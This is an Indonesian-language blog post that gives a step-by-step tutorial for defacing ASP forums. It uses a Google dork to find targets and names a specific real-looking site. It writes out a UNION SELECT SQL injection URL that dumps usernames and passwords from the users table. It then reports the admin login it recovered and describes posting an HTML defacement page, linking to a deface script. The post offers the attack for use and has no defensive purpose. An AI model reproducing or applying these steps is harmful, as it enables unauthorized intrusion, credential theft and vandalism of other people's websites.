langsung ya
Ketik di google
inurl:/forums.asp?iFor=
Pilih target...
Contoh target
http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=17
Hapus angka dibelakang =
Hingga menjadi ini
http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=
Setelah = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,1
1,12+from+users
Hingga menjadi seperti ini
http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya
Cari username admin & passnya.
Ok..pada web target yg jadi bahan tutor ini saya menemukan username & password
Username : admin
Password : default
Sekarang klik tulisan login yg berada diatas.
Nah..login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan "POST NEW TOPICS"
Isi Subject nya...
Contoh : HACKED BY BLA BLA BLA
lalu masukin script deface HTML nya ke kolom di bawah subject.
Hmm......
Jika ingin menutup full seluruh halaman, pake code berikut
http://pastebin.com/wnjs0mGp
Jangan lupa di edit dulu kataò nya !!!
Trus klik tombol post....
Ok...HTML deface an lo udah masuk...sekarang klik judul postingan yg lo tulis di subject tadi.
ntar jadi nya begini gan
http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/messages.asp?iMsg=557&iFor=16
Salam Kenal Dari Newbie :(



Comments : Ada 0 komentar untuk deface forum trik lama By Lamerkch
Posting Komentar